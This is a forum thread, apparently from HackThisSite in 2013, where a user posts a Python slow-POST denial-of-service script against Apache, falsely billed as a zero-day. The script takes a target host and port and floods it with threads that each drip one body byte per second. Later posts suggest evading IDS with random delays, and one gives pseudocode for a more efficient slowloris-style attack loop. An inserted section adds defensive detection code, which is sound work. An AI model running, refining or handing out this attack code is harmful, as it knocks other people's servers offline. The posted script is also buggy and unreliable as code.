
[NEW] Apache 0day!!! only available on HTS [NEW]

Posted: Wed Aug 14, 2013 4:05 pm
by Th3_M4d_H4tt3r
Here is the code HTS, this is proof of concept only, use this only on your own servers, I am not responsible for anything you do with this program.
Code:
#!/usr/bin/python

#Apache Exploit developed by Th3_M4d_H4tt3r

#This exploit crashes (and consumes all connections to the server) within seconds.

#Th3_M4d_H4tt3r
#Attack: Infinite
#Defence: Infinite
#Inteligence: N/A
#Age: 13
#Orgin: Wonderland

import socket
from time import sleep
import threading

print "Welcome to Th3_M4d_H4tt3r's 0day Exploit for apache 2.X.X"

RHOST=raw_input("RHOST: ")
RPORT=int(raw_input("RPORT: "))

def PostExploit(HOST, PORT):
   while 1:
      try:
         s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         s.connect(HOST, PORT)
         s.send('''POST / HTTP/1.1
Host: '''+HOST+'''
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: '''+HOST+''':'''+PORT+'''
Connection: keep-alive
Content-Type: multipart/form-data
Content-Length: 65535

''')
         for i in xrange(0, 65535):
            sleep(1)
            s.send("A")
         s.send("\n\n")
      except:
         pass
count = 0
while 1:
   try:
      Exploit = threading.Thread(target=PostExploit, args=(RHOST, RPORT,))
      Exploit.start()
      count = count+1
      print "Made "+str(count)+" connections."
      print "\033[2A"
   except:
      pass


Do not post this anywhere else!

I made some minor tweaks to the code so skids can't use it.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Posted: Wed Aug 14, 2013 7:50 pm
by F6Zman
Yeah...

If this works, you are really going to please the moronic script kiddies who don't know anything about programming/hacking until this post gets removed.

Disclaimer :
HackThisSite does not support illegal activities.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Posted: Wed Aug 14, 2013 9:39 pm
by Th3_M4d_H4tt3r
It crashed my web server with 116 connections :D

Also, this is not illegal to post exploit code, unless the application is closed-source; and you posted it with the intent of attacking other servers, yes; it is illegal.

I have broken no laws.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Posted: Wed Aug 14, 2013 9:44 pm
by F6Zman
You seem to be quite good at python, how did you learn python?

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Posted: Thu Aug 15, 2013 12:43 am
by apples
This is hilarious! Your code sucks.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Posted: Thu Aug 15, 2013 3:56 am
by ghost107
The code is only DoS-ing the Apache server with POST requests; for a well-configured server and firewall that isn't even a threat. I wouldn't call it a 0-day exploit.

Since you're POSTing the data, you will need a file on the Apache server to take the data; since no data is taken, it will return 4xx and the connection is dropped.

As a suggestion, I wouldn't use a thread-based technique (unless you're trying to use CUDA threads), because you will run out of memory before you deny any service (the more threads it creates, the slower it gets). I suggest using an IO strategy instead of the thread-based one (usually a computer will have around 1000-2000 threads).
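
Added example, not part of any post in this thread: a defender-side check for the pattern the posted script relies on, namely a POST that declares a large Content-Length and then delivers the body at about one byte per second. The `Conn` record, the sample snapshot, and the thresholds (20 s grace, 500 bytes/s, 3 connections per client) are assumptions made for illustration.

```python
from collections import Counter
from dataclasses import dataclass

@dataclass
class Conn:
    client: str          # peer address
    content_length: int  # Content-Length declared in the request headers
    body_bytes: int      # body bytes received so far
    body_secs: float     # seconds elapsed since the headers completed

# Constructed snapshot of in-flight POSTs (documentation-range addresses).
SAMPLE = [
    Conn("198.51.100.7", 65535, 40, 40.0),           # 1 byte/s, as in the script
    Conn("198.51.100.7", 65535, 38, 38.0),
    Conn("198.51.100.7", 65535, 35, 35.0),
    Conn("203.0.113.20", 48213, 48213, 0.4),         # finished upload
    Conn("203.0.113.21", 2_000_000, 900_000, 30.0),  # large but fast
    Conn("203.0.113.22", 512, 0, 2.0),               # still inside the grace period
]

def is_slow_body(c, grace=20.0, min_rate=500.0):
    """True when an unfinished body has outlived `grace` below `min_rate` B/s."""
    if c.body_bytes >= c.content_length or c.body_secs <= grace:
        return False
    return c.body_bytes / c.body_secs < min_rate

def seconds_to_finish(c):
    """How long the worker stays tied up if the sender keeps its current rate."""
    if c.body_bytes == 0:
        return float("inf")
    rate = c.body_bytes / c.body_secs
    return (c.content_length - c.body_bytes) / rate

def slow_clients(conns, per_client=3):
    """Clients holding at least `per_client` slow-body connections at once."""
    counts = Counter(c.client for c in conns if is_slow_body(c))
    return {ip: n for ip, n in counts.items() if n >= per_client}

if __name__ == "__main__":
    for ip, n in slow_clients(SAMPLE).items():
        print(f"{ip}: {n} slow POST bodies")
    held = seconds_to_finish(SAMPLE[0])
    print(f"each would hold a worker for about {held:.0f} s if left alone")
```

Apache's mod_reqtimeout (`RequestReadTimeout`) enforces a comparable body timeout with a minimum data rate on the server itself, which is why a configured server drops these connections long before the declared length is reached.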

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Posted: Fri Aug 16, 2013 11:05 am
by Th3_M4d_H4tt3r
This is a 0day, this is a POST based slowloris for apache, nothing too special.
I could use a random delay (1-3 secs) between thread starting, to attempt to mitigate from IDS or firewall, these normally look for patterns.

If you guys have any more questions/comments PM me, I will update code if neccasary (sure I am great at python, but spelling :lol: ).

Oh and apples, how can I implement the IO strategy or cuda threads? This should help improve the code.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Posted: Fri Aug 16, 2013 1:44 pm
by ghost107
You don't have CUDA in Python. The IO strategy is to not use threads; you only use 1 thread (this is more server side, usually it is used for non-blocking functions). If you want to use a multithreaded model, try to manage the threads (using thread pooling; Python has support for thread pooling).

The method for thread pooling is simple: you have a queue that contains the threads you execute, and the queue has a normal limit and a max limit:
- the normal limit is the number of threads you keep in the pool
- the max limit is the maximum number of threads you allow

The idea of thread pooling is that instead of creating new threads you use the same threads over and over to handle your operations; that way you keep the best PC speeds.

Plus I don't see the reason why you use threads for the send function, which is a non-blocking function (it will not block your program functionality).

If you are talking about slowloris, it is about sending HTTP requests to a server that is a "thread based" server at regular intervals so as not to close the connection (and don't close the headers with \r\n\r\n).
For example:
Code:
You connect to the server:
Send (POST / HTTP/1.1)
send(Host: 'HOST)
your loop{
  Wait few seconds before the socket try's to close
  send (Random Header)
}


Using an IO strategy is simple, for example:
in this example you can have a list of sockets and the last time each socket was sent.
Code:
your loop{
    Create a socket, and connect to the server
    save your socket in the list
    check your list for available sockets,
     get the new list of available sockets
     For each element in the new  list {
           check the socket status
           reconnect the socket if it needs
           send data
      }
}


You can make it a hybrid, by creating channels in different threads (by having thread pooling). This way you keep the connection open and are sure your sockets are open, not creating new connections and then sending data.

In slowloris the headers are never closed; if you close the headers you let the server process the data, and then it evaluates your data (you're sending the headers at once, while you make a POST method).

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Posted: Sat Aug 17, 2013 3:45 am
by Th3_M4d_H4tt3r
That is kind of what I was thinking, I am working on it. 8-)

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Posted: Thu Aug 22, 2013 8:49 am
by Goatboy
... Do you know what 0day means?

This is like 1,467day